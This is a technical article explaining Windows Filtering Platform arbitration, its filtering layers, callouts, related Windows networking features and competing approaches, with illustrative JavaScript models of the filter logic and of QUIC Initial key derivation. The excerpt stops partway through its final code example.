Here is the question every Windows administrator has asked: how do two competing security products coexist on the same machine without crashing each other? Before Vista the honest answer was, "they didn't, mostly, and when they did it was an accident." After Vista the honest answer is, "WFP arbitrates them deterministically." The mechanism is the load-bearing piece of the platform, and it is built out of two ideas.

Idea 1: Sublayers and weights

Microsoft's "Filter Arbitration" page describes the algorithm in two sentences that almost no Windows administrator has read:

"Each filter layer is divided into sub-layers ordered by priority (also called weight). Network traffic traverses sub-layers from the highest priority to the lowest priority... Within each sub-layer, filters are ordered by weight. Network traffic is indicated to matching filters from highest weight to lowest weight." [@wfp-arbitration]

A layer (say, FWPM_LAYER_ALE_AUTH_CONNECT_V4, the place where outbound IPv4 TCP connection authorization is decided) contains an ordered list of sublayers. Each sublayer contains an ordered list of filters. Sublayer priority orders the sublayers. Filter weight orders the filters within a sublayer. Network traffic walks the structure top-down, sublayer by sublayer, filter by filter, until a terminal action is reached.
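The traversal can be modelled in a few lines. This is a minimal sketch, not WFP code. The object shapes, `evaluateLayer`, and the sublayer and filter names are hypothetical, and weights are BigInt because filter weights are 64-bit. The sketch returns one verdict per sublayer using the first-match-wins rule. It deliberately ignores the early stop a hard Block triggers, since composing verdicts across sublayers is the separate step Idea 2 describes.

```javascript
// Minimal model of layer -> sublayer -> filter traversal. Sublayers are walked
// by priority (highest first); inside each, matching filters are tried by
// weight (highest first) and the first Permit or Block wins that sublayer.
const byDesc = (key) => (a, b) => (a[key] < b[key] ? 1 : a[key] > b[key] ? -1 : 0);

function evaluateLayer(layer, pkt) {
  const perSublayer = [];
  for (const sub of [...layer.sublayers].sort(byDesc('priority'))) {
    let winner = null;
    for (const f of [...sub.filters].sort(byDesc('weight'))) {
      if (!f.match(pkt)) continue;
      if (f.action === 'Permit' || f.action === 'Block') {
        winner = f; // first match wins; lower-weight filters never run
        break;
      }
    }
    perSublayer.push({ sublayer: sub.name, verdict: winner ? `${winner.action} (${winner.name})` : 'Continue' });
  }
  return perSublayer;
}

// Hypothetical layer with two vendor sublayers (BigInt weights, numeric priorities).
const layer = {
  name: 'FWPM_LAYER_ALE_AUTH_CONNECT_V4',
  sublayers: [
    { name: 'vendor-b', priority: 0x0800, filters: [{ name: 'b-any', weight: 1n, action: 'Permit', match: () => true }] },
    {
      name: 'vendor-a',
      priority: 0x1000,
      filters: [
        { name: 'a-low', weight: 1n << 60n, action: 'Permit', match: () => true },
        { name: 'a-high', weight: (1n << 60n) + 7n, action: 'Block', match: (p) => p.dport === 445 },
      ],
    },
  ],
};

console.log(evaluateLayer(layer, { dport: 445 }).map((r) => `${r.sublayer}: ${r.verdict}`).join('; '));
// vendor-a: Block (a-high); vendor-b: Permit (b-any)
```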

Sublayer: A named, priority-ordered subdivision of a WFP filtering layer. Each sublayer owns a list of filters and has its own GUID. Microsoft's recommendation, in the filter-weight documentation, is that independent vendors "create their own sublayer by using `FwpmSubLayerAdd0`" rather than register filters into another vendor's sublayer [@wfp-weight]. Sublayer priority is what lets two vendors coexist without interfering.

Filter weight: A 64-bit value attached to a filter that orders evaluation within a sublayer. The "Filter Weight Assignment" page documents three legal assignment styles: "Set the weight to an FWP_UINT64. BFE uses the supplied weight as is. Set the weight to FWP_EMPTY. BFE automatically generates a weight in the range [0, 2^60). Set the weight to an FWP_UINT8 in the range [0, 15]. BFE uses the supplied weight as a weight range identifier" [@wfp-weight]. Sixteen high-order weight ranges, each $2^{60}$ values wide, give vendors a way to carve out non-overlapping neighbourhoods.

The mathematical model is simpler than the prose suggests. Filter weight is an element of $[0, 2^{64})$. A filter at weight $w_1$ runs before a filter at weight $w_2$ inside the same sublayer if $w_1 > w_2$. Sublayer priority orders the sublayers themselves. When a vendor registers its sublayer at, say, priority 0x1000 and chooses filters in the weight range $[2^{60}, 2^{61})$, that vendor has a deterministic neighbourhood that no other vendor will trample, provided the other vendors follow Microsoft's recommendation to call FwpmSubLayerAdd0 and use their own sublayer.

The 16-range partitioning via FWP_UINT8 weights is the mechanism that the platform team baked in to give vendors a coordination protocol without requiring vendors to talk to each other. Microsoft Learn's recommendation, verbatim: "This issue can be prevented by having callouts create their own sublayer by using FwpmSubLayerAdd0" [@wfp-weight].
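The range arithmetic is easy to check with BigInt. This sketch rests on one stated assumption: that an FWP_UINT8 range identifier $k$ selects the half-open interval $[k \cdot 2^{60}, (k+1) \cdot 2^{60})$. That mapping is consistent with the FWP_EMPTY range $[0, 2^{60})$ quoted above and with the $[2^{60}, 2^{61})$ example. `weightRange` and `rangeOfWeight` are illustrative helpers, not BFE functions.

```javascript
// Weight-range arithmetic with BigInt (filter weights are 64-bit).
// Assumption: range identifier k (0..15) maps to [k * 2^60, (k + 1) * 2^60).
const RANGE_WIDTH = 1n << 60n;

function weightRange(k) {
  if (!Number.isInteger(k) || k < 0 || k > 15) throw new RangeError('range identifier must be 0..15');
  const lo = BigInt(k) * RANGE_WIDTH;
  return { lo, hi: lo + RANGE_WIDTH }; // half-open [lo, hi)
}

function rangeOfWeight(w) {
  return Number(w / RANGE_WIDTH); // BigInt division truncates
}

const r1 = weightRange(1);
console.log(r1.lo === 1n << 60n, r1.hi === 1n << 61n); // true true
console.log(weightRange(15).hi === 1n << 64n);        // true: 16 ranges tile [0, 2^64)
console.log(rangeOfWeight((1n << 60n) + 42n));        // 1
```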

Idea 2: Block-overrides-Permit with Veto

Filter arbitration is actually two passes, not one. Within a single sublayer, the engine evaluates the filters that match in weight order from highest to lowest, and stops at the first filter that returns Permit or Block. That first matching filter wins; lower-weight filters in the same sublayer never run. The engine then performs the same pass on the next sublayer down. The filter engine composes those per-sublayer verdicts, in priority order, into one per-layer decision -- and that is where Block-over-Permit and the soft/hard override flag come in. Filter Arbitration states the second pass:

"'Block' overrides 'Permit'. 'Block' is final (cannot be overridden) and stops the evaluation. The packet is discarded." [@wfp-arbitration]

"Block" and "Permit" each come in two variants. The variant is set by a per-action flag, FWPS_RIGHT_ACTION_WRITE, in the callout's classify-output structure: "If the flag is set, it indicates that the action can be overridden. If the flag is absent, the action cannot be overridden" [@wfp-arbitration]. The four-row table below is the override-policy table the filter engine uses to compose per-sublayer verdicts into one layer-level action.

Action	Override allowed?	Common name	What it means
Permit + `FWPS_RIGHT_ACTION_WRITE`	Yes	Soft permit	A lower-priority sublayer's verdict (composed later by the filter engine) may overturn it [@wfp-arbitration]
Permit, flag absent	No	Hard permit	Final permit; only a callout Veto in another sublayer can block it [@wfp-arbitration]
Block + `FWPS_RIGHT_ACTION_WRITE`	Yes	Soft block	A lower-priority sublayer may overturn it, but Block-over-Permit still applies if no override fires [@wfp-arbitration]
Block, flag absent	No	Hard block	Final block. Evaluation stops. Packet discarded. [@wfp-arbitration]

The soft/hard distinction is therefore a cross-sublayer property, not a within-sublayer one. Within a sublayer the rule is "first match wins"; only the composition step between sublayers consults the override flag.

There is a fifth case. A callout that returns FWP_ACTION_BLOCK after a higher-priority sublayer has already issued a hard permit (FWPS_RIGHT_ACTION_WRITE cleared) is exercising what the documentation calls a Veto. The callout has been given the opportunity to authorize the traffic and has refused. That is how a third-party EDR's deep-inspection callout can refuse a flow that an in-box filter has already permitted, even with a hard permit: the engine offers the packet, the callout says no, and the no is final.

sequenceDiagram
    participant E as Filter engine
    participant S1 as Sublayer @ priority 100 (no matching filter)
    participant S2 as Sublayer @ priority 50 (winner: soft permit)
    participant S3 as Sublayer @ priority 10 (winner: hard permit)
    participant C as Deep-inspection callout (registered in default sublayer)
    E->>S1: evaluate highest-priority sublayer
    S1-->>E: no matching filter (Continue)
    E->>S2: evaluate next sublayer
    S2-->>E: Soft Permit (FWPS_RIGHT_ACTION_WRITE)
    Note over E: tentative layer action = Permit (overridable)
    E->>S3: evaluate next sublayer
    S3-->>E: Hard Permit (no override flag)
    Note over E: layer action = Permit (final unless a callout vetoes)
    E->>C: invoke callout for the permitted flow
    C-->>E: Veto -> Block (terminal)
    Note over E: final layer-level action = Block

Walk a worked example. An AppContainer process (an Edge tab, say, or any process launched with CreateProcess and an AppContainer SID token) tries to open an outbound TCP connection to 203.0.113.5:443. The Windows TCP/IP stack invokes the ALE shim, which classifies the connection request at FWPM_LAYER_ALE_AUTH_CONNECT_V4. The filter engine walks the sublayers at that layer from highest priority to lowest. Within each sublayer, filters fire highest-weight-first, and the first matching Permit or Block ends evaluation in that sublayer. If a vendor EDR has placed a Veto-style deep-inspection callout in its own sublayer, the callout runs and can deny the connection regardless of what any other sublayer would have done. If no filter explicitly permits the AppContainer with the matching capability SID (internetClient, internetClientServer, or privateNetworkClientServer), the "Block Outbound Default Rule" filter in the firewall's default sublayer fires last and the connection is denied [@forshaw-2021].

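{`
// A simplified model of the cross-sublayer composition pass described on the
// Microsoft Learn "Filter Arbitration" page. The within-sublayer pass (not
// shown) yields one verdict per sublayer by first-match-wins on weight-ordered
// filters; composeAcrossSublayers combines those verdicts into the layer action.
// Source: https://learn.microsoft.com/en-us/windows/win32/fwp/filter-arbitration

// "hard" means FWPS_RIGHT_ACTION_WRITE is absent: the verdict cannot be overridden.
const HARD_BLOCK = { action: 'Block', hard: true }, SOFT_BLOCK = { action: 'Block', hard: false };
const HARD_PERMIT = { action: 'Permit', hard: true }, SOFT_PERMIT = { action: 'Permit', hard: false };

function composeAcrossSublayers(pkt, sublayers) {
  // Highest sublayer priority first (the comparison also works for BigInt).
  const ordered = [...sublayers].sort((a, b) => (a.priority < b.priority ? 1 : a.priority > b.priority ? -1 : 0));
  let current = null; // verdict so far: { action, hard, by }
  for (const s of ordered) {
    if (!s.match(pkt)) continue; // no matching filter: Continue
    const v = s.verdict(pkt);
    if (current && current.action === 'Permit' && current.hard) {
      // A hard permit is final; only a callout returning Block (a Veto) overturns it.
      if (s.callout && v.action === 'Block') return { decision: 'Block', by: s.sublayer };
      continue;
    }
    if (v.action === 'Block' && v.hard) return { decision: 'Block', by: s.sublayer }; // hard block stops evaluation
    // Block overrides Permit; a hard verdict replaces a soft one.
    if (!current || v.hard || (v.action === 'Block' && current.action === 'Permit')) current = { ...v, by: s.sublayer };
  }
  return current && { decision: current.action, by: current.by }; // null if no sublayer matched
}

// Each element is one sublayer's winning verdict, with its sublayer priority.
const sublayerVerdicts = [
  // Vendor EDR deep-inspection callout, hard block on a known-bad destination
  { sublayer: 'EDR-veto', priority: 100n, callout: true, match: (pkt) => pkt.dst === '203.0.113.5', verdict: () => HARD_BLOCK },
  // Windows Defender Firewall app rule, allow-with-override
  { sublayer: 'WDF-allow', priority: 50n, match: () => true, verdict: () => SOFT_PERMIT },
  // Block Outbound Default Rule (BFE default sublayer)
  { sublayer: 'block-default', priority: 10n, match: () => true, verdict: () => HARD_BLOCK },
];

console.log(composeAcrossSublayers({ dst: '203.0.113.5' }, sublayerVerdicts)); // -> { decision: 'Block', by: 'EDR-veto' } (hard block at priority 100)
console.log(composeAcrossSublayers({ dst: '198.51.100.7' }, sublayerVerdicts)); // -> { decision: 'Block', by: 'block-default' } (soft permit overridden by hard block)
`}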

Key idea: Two competing Windows security products coexist on the same host because each one owns its own sublayer, with its own weight neighbourhood. Within a sublayer the filter engine picks one winner using "first matching Permit or Block stops evaluation." Across sublayers the filter engine composes those winners using "Block overrides Permit, hard actions are final, soft actions can be overridden." Pre-Vista, Windows had filters. Post-Vista, Windows has arbitration.

The engine arbitrates filters deterministically and separates condition-match (the filter) from action (the callout). What does the modern surface look like, in 2026, with two decades of features bolted on top?

6. The Modern WFP Surface

It is 2026. WFP is twenty years old, has never been replaced, and ships under more components than any other Windows networking primitive. Here is what it looks like today.

The filter engine and its kernel client

The filter engine is the same architectural piece WFP v1 shipped with: a cross-mode classifier whose kernel-mode classification path runs primarily inside NETIO.SYS and whose user-mode side runs inside the Base Filtering Engine service host process [@wfp-arch][@forshaw-2021]. Callouts and filter consumers do not link against NETIO.SYS. They link against a different binary.

fwpkclnt.sys: The kernel-mode WFP client and export driver. Callout drivers and other kernel components link against `fwpkclnt.lib`, whose in-memory module is `fwpkclnt.sys` [@wfp-arch]. The driver is the API surface that callouts use to register, classify, and call back into the engine. The classification path itself, where filters are matched and actions chosen, runs primarily in `NETIO.SYS`. The shorthand "fwpkclnt.sys *is* the filter engine" is common in blog posts and incorrect; the two binaries do different jobs.

The BFE-vs-MpsSvc split is the second confusion to clear. bfe is the Base Filtering Engine, the platform service [@wfp-about]. MpsSvc is the Windows Defender Firewall service, one consumer of the platform. The dependency goes one way: MpsSvc depends on bfe; bfe does not depend on MpsSvc.

You can verify the dependency direction on any running Windows box. Run `Get-Service bfe` and `Get-Service mpssvc`, then `Get-Service mpssvc | Select-Object -ExpandProperty ServicesDependedOn`, which will list BFE (among others); the reverse query on bfe lists no dependency on mpssvc. Forshaw's 2021 post documents the same arrow from the policy side: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service" [@forshaw-2021].

Roughly sixty filtering layers

Microsoft's "Management Filtering Layer Identifiers" reference enumerates about sixty FWPM_LAYER_* GUIDs, organised by shim, direction (inbound, outbound, forward), stage (pre-IPsec, post-IPsec, discard), and IP version (v4 / v6) [@wfp-layers]. The reference page is dense, but reading it once teaches the structure. A small sample of representative layers:

FWPM_LAYER_INBOUND_IPPACKET_V4 and _V6. "Located in the receive path just after the IP header of a received packet has been parsed but before any IP header processing takes place. No IPsec decryption or reassembly has occurred" [@wfp-layers]. The earliest visibility a callout has into a received packet.
FWPM_LAYER_OUTBOUND_IPPACKET_V4 and _V6. The send-path twin.
FWPM_LAYER_IPFORWARD_V4 and _V6. The routing-decision point on a forwarding host [@wfp-layers].
FWPM_LAYER_INBOUND_TRANSPORT_V4 and _V6. After the TCP/UDP/ICMP header has been parsed but before payload delivery [@wfp-layers].
FWPM_LAYER_STREAM_V4 and _V6. The TCP stream layer where reassembled byte streams are visible [@wfp-layers].
FWPM_LAYER_DATAGRAM_DATA_V4 and _V6. Connectionless data delivery (UDP / ICMP) [@wfp-layers].
FWPM_LAYER_INBOUND_MAC_FRAME_ETHERNET. Added in Windows 8; the L2 hook the "What's New" page introduced [@wfp-whatsnew].

Most packet-path layers, including every IP-packet, forwarding, transport, stream, and datagram-data layer listed above, have a DISCARD twin that fires when the engine has decided to drop a packet at that point. Callouts that need to log drops register at the DISCARD layer; callouts that need to inspect or modify register at the non-DISCARD twin [@wfp-layers].

ALE classification

The ALE shim sits across seven FWPM_LAYER_ALE_* filtering layers plus the two redirection layers introduced in the Windows 10 era [@wfp-ale-layers]:

RESOURCE_ASSIGNMENT -- local endpoint assignment (bind).
AUTH_LISTEN -- TCP listen.
AUTH_RECV_ACCEPT -- inbound TCP accept; inbound UDP/ICMP first datagram.
AUTH_CONNECT -- outbound TCP connect; outbound UDP/ICMP first datagram.
FLOW_ESTABLISHED -- the stateful "connection now exists" event.
RESOURCE_RELEASE, ENDPOINT_CLOSURE -- teardown.
CONNECT_REDIRECT, BIND_REDIRECT -- the Windows 10 redirection hooks.

Stateful per-flow context lives in the ALE shim. Application identity at each ALE layer is a normalized file name; user identity is a security descriptor [@wfp-ale]. That pair is what turns "block port 443 outbound" into "block port 443 outbound from chrome.exe running as user S-1-5-21-...."
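The difference between the two rules can be shown as predicates. This is a minimal sketch with simplified inputs, and `makeAleRule` is hypothetical. The application identity is a plain path compared case-insensitively, whereas real WFP uses a normalized file name. The user identity is reduced to one SID string, whereas WFP actually evaluates a security descriptor. The path and SIDs are made up.

```javascript
// Hypothetical ALE-style rule predicates (not a WFP API). appId stands in for
// the normalized file name; userSid simplifies the security descriptor WFP
// actually evaluates down to a single SID string.
function makeAleRule({ remotePort, appId, userSid, action }) {
  return (flow) =>
    flow.remotePort === remotePort &&
    (appId === undefined || flow.appId.toLowerCase() === appId.toLowerCase()) &&
    (userSid === undefined || flow.userSid === userSid)
      ? action
      : null; // no match: evaluation moves on to the next filter
}

// "Block port 443 outbound": matches every application and user.
const portOnly = makeAleRule({ remotePort: 443, action: 'Block' });
// "Block port 443 outbound from chrome.exe running as one user" (made-up path and SID).
const perAppPerUser = makeAleRule({
  remotePort: 443,
  appId: 'c:\\apps\\chrome.exe',
  userSid: 'S-1-5-21-0-0-0-1001',
  action: 'Block',
});

const alice = { remotePort: 443, appId: 'C:\\Apps\\chrome.exe', userSid: 'S-1-5-21-0-0-0-1001' };
const bob = { ...alice, userSid: 'S-1-5-21-0-0-0-1002' };
console.log(portOnly(alice), portOnly(bob));           // Block Block
console.log(perAppPerUser(alice), perAppPerUser(bob)); // Block null
```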

In-box callouts and downstream features

The "Built-in Callout Identifiers" reference page enumerates the GUIDs of every in-box callout: the FWPM_CALLOUT_IPSEC_* family (transport, tunnel, forward-tunnel, inbound-initiate-secure, ALE-connect); FWPM_CALLOUT_WFP_TRANSPORT_LAYER_V4_SILENT_DROP and _V6_SILENT_DROP; the FWPM_CALLOUT_TCP_CHIMNEY_* callouts [@wfp-builtin-callouts]. Microsoft describes the four canonical roles a callout plays: "Deep Inspection... Packet Modification... Stream Modification... Data Logging" [@wfp-callouts].

Callout driver: A kernel driver that registers one or more callout functions with the filter engine. The engine invokes a callout's `classifyFn` when a filter at a layer specifies the callout's GUID as its action [@wfp-filter-engine]. Callouts implement one of four roles: deep inspection (read-only payload examination), packet modification, stream modification, or data logging [@wfp-callouts]. Nearly every third-party network-security product on Windows that runs in the kernel ships a callout driver.
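The filter-to-callout indirection can be sketched as a lookup table. This is a minimal model, not the WFP API. `FilterEngineModel`, `registerCallout`, and `applyFilter` are hypothetical names, the GUID is made up, and the callout shown plays the deep-inspection role. Real WFP behaviour, when a filter names a callout that is not registered, depends on the filter's action type. The sketch does not model it and simply returns `'Continue'`.

```javascript
// Hypothetical model of filter-to-callout dispatch (not the WFP API).
// A filter's action is either terminal ('Permit' / 'Block') or names a
// callout key; the engine looks the key up and calls that classify function.
class FilterEngineModel {
  constructor() {
    this.callouts = new Map(); // callout key (GUID string) -> classifyFn
  }

  registerCallout(key, classifyFn) {
    this.callouts.set(key, classifyFn);
  }

  applyFilter(filter, pkt) {
    if (filter.action.type !== 'callout') return filter.action.type; // terminal action
    const classifyFn = this.callouts.get(filter.action.calloutKey);
    // Real WFP handling of an unregistered callout is not modelled here.
    return classifyFn ? classifyFn(pkt) : 'Continue';
  }
}

// A made-up GUID and a read-only "deep inspection" callout.
const EDR_CALLOUT = '11111111-2222-3333-4444-555555555555';
const engine = new FilterEngineModel();
engine.registerCallout(EDR_CALLOUT, (pkt) => (pkt.payload.includes('bad-marker') ? 'Block' : 'Permit'));

const filter = { action: { type: 'callout', calloutKey: EDR_CALLOUT } };
console.log(engine.applyFilter(filter, { payload: 'hello' }));       // Permit
console.log(engine.applyFilter(filter, { payload: 'x bad-marker' })); // Block
```

Separating the filter (the condition) from the callout (the action logic) is what lets one callout serve many filters.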

The downstream features are not peers of WFP. They are configurations of it.

Windows Defender Firewall with Advanced Security (WFAS). Microsoft Learn names this relationship verbatim: "The firewall application that is built into Windows Vista, Windows Server 2008, and later operating systems Windows Firewall with Advanced Security (WFAS) is implemented using WFP" [@wfp-start]. The MpsSvc service translates the WFAS rule database into WFP filters that live in the MPSSVC_WSH provider's sublayer [@forshaw-2021].
Windows IPsec. The Base Filtering Engine "plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine" [@wfp-about]. IPsec is not a separate stack; it is a configuration of WFP plus the IKE/AuthIP keying modules.
WinNAT and Windows container networking. The PowerShell cmdlet New-NetNat "creates a Network Address Translation (NAT) object that translates an internal network address to an external network address" [@netnat]; WinNAT, the implementation behind it, registers WFP filters to perform the translation. Windows containers use WinNAT for their default NAT switch.
Hyper-V Extensible Switch. Since Windows 8 / Server 2012, "the Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012," and the switch supports extensible-switch extensions that "bind within the extensible switch driver stack" [@hyperv-extswitch]. WFP filters and callouts can be placed at vSwitch ingress and egress [@wfp-whatsnew].
Microsoft Defender for Endpoint Network Protection. The Microsoft Learn page documents the capability: "Network Protection will block connections on all ports (not just 80 and 443)" [@mde-netprot]. The product enforces SmartScreen domain reputation across the entire process tree, not just the browser. The exact WFP-layer registration map is not publicly documented: Microsoft has published the capability [@mde-netprot] but not the set of FWPM_LAYER_* identifiers Network Protection registers callouts at, and community reverse engineering knows only fragments of the map. This is one of the rare honest-disclosure moments in the WFP story; Section 9 treats it as an open engineering problem.
Third-party EDR network filters. CrowdStrike Falcon, SentinelOne, Cisco Secure Endpoint, ESET, Sophos, and the rest of the EDR vendor list ship WFP callout drivers as the standard kernel-side primitive for network telemetry and policy enforcement. There is no single Microsoft document that lists them. Forshaw's 2021 Project Zero post is the closest a primary source comes to acknowledging that this is how the industry has settled [@forshaw-2021].

The textbook reference for WFP architecture is *Windows Internals, Part 2*, 7th edition, by Russinovich, Solomon, Ionescu, Yosifovich, and Allievi (Microsoft Press, 2021) [@windows-internals-7th]. The book's Networking chapter walks through TCP/IP driver internals and WFP architecture together, including the filter-engine / BFE / shim taxonomy this article has used. Treat the book as the slow-read complement to the Microsoft Learn references; the chapter does not duplicate the Learn pages, it explains why the architecture chose the shape it did. Page numbers vary by printing; cite by chapter heading.

Five downstream features on one engine. So what are the alternatives, if you want to ship a kernel-mode network filter on Windows today and do not want to use WFP?

7. Competing Approaches -- LWF, eBPF, Extensible Switch, and the Azure VFP

WFP is the L3+ answer. What else is there to attach to?

NDIS Lightweight Filter (LWF). The L2 sibling. NDIS 6.0, shipped with Vista, introduced "NDIS filter drivers. Filter drivers can monitor and modify the interaction between protocol drivers and miniport drivers. Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers" [@ndis-filter]. LWF is the modern replacement for NDIS 5.x intermediate drivers. It sits below the protocol stack, sees raw Ethernet frames, has no application identity, and is the right choice for raw L2 work: VLAN tagging, EAPoL, packet capture (Npcap, NMNT). Choose LWF over WFP when you need pre-IP visibility and no per-process identity.

LWF driver: A kernel filter driver registered with NDIS that monitors or modifies the path between a protocol driver and a miniport driver. LWF replaced NDIS 5.x intermediate drivers starting with NDIS 6.0 [@ndis-filter]. LWF drivers see Ethernet frames before any IP processing has happened. They cannot see application identity, since the OS does not yet know which process the frame belongs to.

Hyper-V Extensible Switch extensions. A specialised NDIS LWF profile. NDIS 6.30, Windows Server 2012. "The Hyper-V extensible switch supports an interface that allows instances of NDIS filter drivers (known as extensible switch extensions) to bind within the extensible switch driver stack... The Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012" [@hyperv-extswitch]. Extensions come in three roles -- capture, filter, and forwarding -- with one forwarding-extension slot per vSwitch. Choose extensible switch extensions for Hyper-V Network Virtualization, software-defined-networking overlays, or SR-IOV gating.

eBPF for Windows. A Microsoft-sponsored project to bring the Linux eBPF programming model to Windows. The GitHub README describes its scope as letting existing eBPF toolchains and APIs familiar from Linux be used on top of Windows, and frames the project as a work-in-progress [@ebpf-readme]. Three deployment modes: native ("PREVAIL verifier... bpf2c tool converts every instruction in the bytecode to equivalent C statements... built into a windows driver module (stored in a .sys file)... This is the preferred way of deploying eBPF programs" [@ebpf-readme]); JIT (user-mode service, "with HVCI enabled, eBPF programs cannot be JIT compiled, but can be run in the native mode" [@ebpf-readme]); and interpreter (debug only). The hooks the project exposes (XDP, BIND, SOCK_ADDR, SOCK_OPS, CGROUP_SOCK_ADDR) are the Linux-flavoured analogues of the WFP shim points. The v1.1.0 release, published in March 2026 and labelled "first stable" while still tagged Pre-release, "added hard/soft permit verdicts" to its accept and bind hooks -- explicitly mirroring the WFP FWPS_RIGHT_ACTION_WRITE model [@ebpf-releases]. The project's own documentation site repeats the work-in-progress framing [@ebpf-pages]. Choose eBPF for Windows for pre-stack DDoS scrubbing or cross-platform observability prototypes; the production-readiness caveat applies.

eBPF for Windows: A Microsoft-sponsored open-source project that ports the Linux eBPF execution and toolchain to Windows. The native deployment mode compiles eBPF bytecode through PREVAIL verification and the `bpf2c` translator into a signed `.sys` kernel driver, which preserves HVCI compatibility [@ebpf-readme]. As of the v1.1.0 release (March 2026), the project remains tagged Pre-release on GitHub [@ebpf-releases].

Azure VFP -- a name collision that requires disambiguation. The Azure host-SDN data plane, presented by Daniel Firestone at NSDI 2017 [@firestone-nsdi17], is called the Virtual Filtering Platform. Same initials shape as WFP. Different platform. VFP is the programmable virtual switch that runs on every Azure compute host; the NSDI 2017 abstract notes that "VFP has been deployed on >1M hosts running IaaS and PaaS workloads for over 4 years" [@firestone-nsdi17]. It uses match-action tables, layers (the word "layer" appears with a different semantic from WFP's), Unified Flow Tables, and AccelNet FPGA offload via the Generic Flow Table. VFP ships with Azure, on Azure hosts. It is not customer-buildable on a Windows desktop, and Windows desktop and Server SKUs do not run it. The platforms are unrelated despite the name overlap.

Note: The Azure Virtual Filtering Platform (VFP), introduced in Firestone's NSDI 2017 paper, is the Azure host SDN data plane and shares only an acronym shape with the Windows Filtering Platform [@firestone-nsdi17]. VFP runs on Azure hosts as a Hyper-V Extensible Switch extension and is the layer that powers SLB, NSGs, AccelNet, and Azure Virtual Network. It is unrelated to the WFP filter engine, BFE, or fwpkclnt.sys. If a document or support thread seems to mention both names, it is almost certainly about only one of them. The focus-premise audit in this article's source notes flagged the original input's mention of "SecureNAT" as the same kind of terminological drift, one that pointed at the wrong product.

Approach	Layer / scope	App identity	Best for
WFP callout driver	L3+ across approximately sixty `FWPM_LAYER_*` IDs [@wfp-layers]	Yes via ALE [@wfp-ale]	App-aware on-host filtering and EDR telemetry
NDIS LWF	L2, below the protocol stack [@ndis-filter]	No	Raw L2: capture, VLAN, EAPoL
Hyper-V Extensible Switch ext	Inside the vSwitch, NDIS 6.30+ [@hyperv-extswitch]	Per-VM, not per-process	Hyper-V network virtualization, SDN overlays
eBPF for Windows	XDP / BIND / SOCK_ADDR hooks [@ebpf-readme]	Partial	Pre-stack DDoS, cross-platform observability prototypes (Pre-release)
Azure VFP	Azure host SDN; not customer-buildable [@firestone-nsdi17]	N/A	Azure-host SDN policy (Microsoft-internal)

None of these displaces WFP for the dominant on-host case (application-identity-aware, IPsec-integrated, stateful, multi-vendor-arbitrated). All of them also share the same limits, and those limits are set by cryptography, hardware, and the kernel's own attack surface, not by Microsoft's roadmap.

8. Three Ceilings -- Encryption, Offload, Kernel EoP

Three ceilings sit above WFP and every alternative listed above. None is a Microsoft bug. All are structural.

The encryption ceiling

A WFP callout at the stream layer sees plaintext only if the payload was never encrypted, or if it was encrypted with a key the kernel owns (IPsec). IPsec is the one case where the kernel does hold the keys, because the IKE/AuthIP keying modules that BFE plumbs to are themselves Windows components [@wfp-about]. Every other in-process TLS or QUIC stack keeps its keys away from the kernel. TLS 1.3 and QUIC are end-to-end encrypted from the callout's point of view, because the keys live inside the application's user-mode TLS library. A callout that registers at FWPM_LAYER_STREAM_V4 and reads bytes off a Chrome HTTPS connection sees ciphertext.
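To make the ceiling concrete: without keys, the only structure a stream-layer inspector can parse in a TLS connection is the 5-byte record header (RFC 8446, Section 5.1). The following is a minimal JavaScript sketch, not a WFP API. `walkTlsRecords` is a hypothetical helper that walks those headers in an already-reassembled byte buffer. In TLS 1.3 every protected record carries the outer type `application_data` (23), so after the handshake even the record type reveals nothing about what is inside.

```javascript
// Content types a TLS record header can carry (RFC 8446, Section 5.1).
const CONTENT_TYPES = { 20: 'change_cipher_spec', 21: 'alert', 22: 'handshake', 23: 'application_data' };

// Hypothetical helper: walk the cleartext 5-byte record headers in a buffer of
// reassembled stream bytes. It never decrypts; it reports only what is visible.
function walkTlsRecords(bytes) {
  const records = [];
  let offset = 0;
  while (offset + 5 <= bytes.length) {
    const type = bytes[offset];
    const version = (bytes[offset + 1] << 8) | bytes[offset + 2];
    const length = (bytes[offset + 3] << 8) | bytes[offset + 4];
    // Stop at anything that is not a recognisable, complete record.
    if (!(type in CONTENT_TYPES) || offset + 5 + length > bytes.length) break;
    records.push({
      type: CONTENT_TYPES[type],
      version: '0x' + version.toString(16).padStart(4, '0'),
      length, // the record body itself is opaque once traffic keys are in use
    });
    offset += 5 + length;
  }
  return records;
}
```

Given a handshake record followed by an application-data record, the helper reports two headers (type, legacy version, and length) and nothing else. That is the full extent of what key-less inspection can recover.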

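The case is even sharper for QUIC. QUIC runs over UDP and encrypts far more of its own machinery than TLS over TCP does. Only the Initial packets are protected with keys an observer can compute. RFC 9001 derives them from a public, version-specific salt and the Destination Connection ID that the client sends in the clear, so this protection is obfuscation rather than secrecy. Every later packet carries the rest of the handshake and almost all of the transport's control frames, and it is protected with keys that come out of the TLS 1.3 key exchange. A datagram-layer callout that wants to inspect the QUIC handshake -- not the payload, just the handshake -- would therefore have to reimplement QUIC's Initial-packet decryption in the kernel just to read the ClientHello. With Encrypted Client Hello, even that ClientHello no longer names the real destination. Microsoft's own product team has acknowledged the limit in plain English on the Defender for Endpoint Network Protection page: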
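QUIC's Initial packet protection is deliberately not secret, which is why the hard part for a kernel callout starts after the first flight. RFC 9001 (Section 5.2) derives the client's Initial keys from a fixed, public salt and the client's cleartext Destination Connection ID. The sketch below performs that derivation in Node.js using only the built-in `crypto` module, with HKDF-SHA256 and TLS 1.3's HKDF-Expand-Label. The function names are hypothetical. The sketch does not remove header protection or decrypt anything. It also cannot produce Handshake or 1-RTT keys, because those come from the TLS 1.3 key exchange.

```javascript
const crypto = require('crypto');

// QUIC version 1 initial salt (RFC 9001, Section 5.2). Public and fixed per version.
const QUIC_V1_INITIAL_SALT = Buffer.from('38762cf7f55934b34d179ae6a4c80cadccbb7f0a', 'hex');

// HKDF-Extract(salt, ikm) = HMAC-SHA256(key = salt, data = ikm) (RFC 5869).
function hkdfExtract(salt, ikm) {
  return crypto.createHmac('sha256', salt).update(ikm).digest();
}

// HKDF-Expand-Label (RFC 8446, Section 7.1) with an empty context, as QUIC uses it.
// HkdfLabel = uint16 length || uint8 labelLen || "tls13 " + label || uint8 0.
function hkdfExpandLabel(secret, label, length) {
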